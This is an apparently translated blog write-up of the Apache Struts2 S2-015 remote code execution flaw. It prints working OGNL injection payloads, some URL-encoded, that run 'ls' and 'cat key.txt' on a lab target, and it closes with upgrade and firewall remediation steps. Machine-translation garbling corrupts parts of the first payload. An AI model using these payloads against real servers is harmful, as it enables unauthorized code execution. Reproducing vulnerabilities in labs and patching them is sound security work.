Introduction to Apache Struts2 remote code execution vulnerability (s2-015)
Apache Struts 2 is an open source Web application framework for developing JavaEE Web applications. Remote command execution vulnerability exists in Apache Struts 2.0.0 to 2.3.14.2. This vulnerability can be exploited by a remote attacker to execute arbitrary OGNL code with a request with sequence values of ‘${}’ and ‘%{}’, which results in OGNL code being judged twice.
Versions: 2.0.0 to 2.3.14.2
CVE number: CVE-2013-2135
Apache Struts2 remote code execution vulnerability (s2-015) reappears
I originally said that I would build an environment to demonstrate the vulnerability, but later I remembered that there are some vulnerability shooting range environments in moshe College (www.mozhe.cn/), and I found them (~ ▽ ~) ~.
Open the target:
Although we know that this is a target with Apache Struts2 remote code execution vulnerability (S2-015), we still follow the normal steps to test it. I used struts2-scan. Here is the download link and how to use it (github.com/HatBoy/Stru…). .
Note: Python3.6.X or later is required for use.
Run:
Start scanning:
S2-012, S2-046, s2-015 vulnerabilities were found. I see a lot on the Internet here to use THE S2-46 vulnerability directly connected to the command execution or shell upload ψ(‘ ∇ ‘), said the GOOD S2-015 vulnerability!! It looks like this. You can find the key directly:
Here we exploit the S2-015 vulnerability by writing exp. # exp = exp # exp = exp # exp = exp
${# context [' xwork. MethodAccessor. DenyMethodExecution '] = false, # m = # _memberAccess getClass () getDeclaredField (' allowStaticM EthodAccess '), # Margaret spellings etAccessible (true), # Margaret spellings et (# _memberAccess, true), # [email protected] mons. IO. IOUtils @ toString (@ Java. Lang. R Untime @ getRuntime (). The exec (" ls "). GetInputStream ()), # q}. The actionCopy the codeOf course, it is urL-encoded to use:
/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.g etDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%2 9%2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27ls%27%29.getInputStre am%28%29%29%2C%23q%7D.actionCopy the code
We found key. TXT file, we can read it, type:
%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.ge tDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29 %2C%23q%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.ge tInputStream%28%29%29%2C%23q%7D.actionCopy the code
So, the key comes out. Of course, our goal is not to get the key, but to reproduce the VULNERABILITY S2-015 and reflect the harm of this vulnerability. Now I will talk about how to fix this vulnerability.
Apache Struts2 remote code execution vulnerability (s2-015) fixed
Pay attention to
- When the Struts version is updated, compatibility problems may occur, which may cause service interruption.
- Tomcat needs to be restarted
- Before upgrading, you are advised to back up the old Struts project directory
Repair process
Confirm the Struts version > download the new Struts library and verify SHA256 > Back up the Struts library > Delete the old Struts library > Replace the new Struts library > Verify the repair results > Complete
Step 1: Determine the Struts version
Determine the Struts application root path (root_dir for short), for example: D: apache-tomcat-7.0.103 webapps struts2-showcase then find root_dir web-INF lib struts2-core-x.x.x.jar where X.X.X is the version number. Struts version is 2.3.37:
Step 2: Download the new Struts library and verify SHA256
Users whose versions are earlier than 2.3 need to download 2.3.37 or later. Users whose versions are later than 2.5 need to download 2.5.22 or later. (note: through the following link to download the Struts libraries need to “scientific” online, unable to download the user can go to website to download the latest version: struts.apache.org/download.cg…).
Download link * * * * is as follows: 2.3.37 version: archive.apache.org/dist/struts… 2.5.22 version: archive.apache.org/dist/struts…
Open CMD command prompt and run the command to obtain SHA256. Certutil-hashfile File path SHA256
For example, certutil-hashfile D:\sain\struts-2.3.37.min-lib.zip SHA256Copy the codeIf the SHA256 obtained is the same as the SHA256 values below, the download is correct
2.3.37 version: 22 f09a1c4cdb760fa13f3e36a84f53682201924f63c65d265ec42ea6dc5e5f53 2.5.22 version: 8da7f12b3525abb0f074b95c90e447b590166ba6baefba776b01584562d07148Copy the codeStep 3: Back up the old Struts library
Backup the root_dir web-INF lib directory
Step 4: Delete the old Struts library
The packages to be deleted for 2.3.x and earlier versions are as follows :(ignore those that do not exist)
commons-fileupload-xxx.jar
commons-io-xx.jar
Commons-lang3-xx.jar (Commons -lang3 not Commons -lang)
commons-logging-xxx.jar
freemarker-xxx.jar
javassist-xxx.GA.jar
ognl-xxx.jar
struts2-core-xxx.jar
Jar or xwork-core-xxx.jar??
2.5.x packages to be deleted are as follows :(ignore those that do not exist)
commons-fileupload-xxx.jar
commons-io-xx.jar
Commons-lang3-xx.jar (Commons -lang3 not Commons -lang)
Freemarker-xxx. jar or freemarker-XXX-Incubator??
javassist-xxx-GA.jar
log4j-api-xxx.jar
ognl-xxx.jar
struts2-core-xxx.jar
Step 5: Replace the new Struts library
Copy the jar package of the lib directory in the new package to the Lib directory of the Struts project (D:\ apache-tomcat-7.0.103 \webapps\struts2-showcase\ web-INF \lib).
Step 6: Restart Tomcat
Repair complete, please check all services are normal!
Apache Struts2 remote code execution vulnerability (s2-015) protection
The update requires Tomcat to restart, which is inconvenient for the server running services. Therefore, if there is a firewall at the border, you can configure corresponding policies to block it.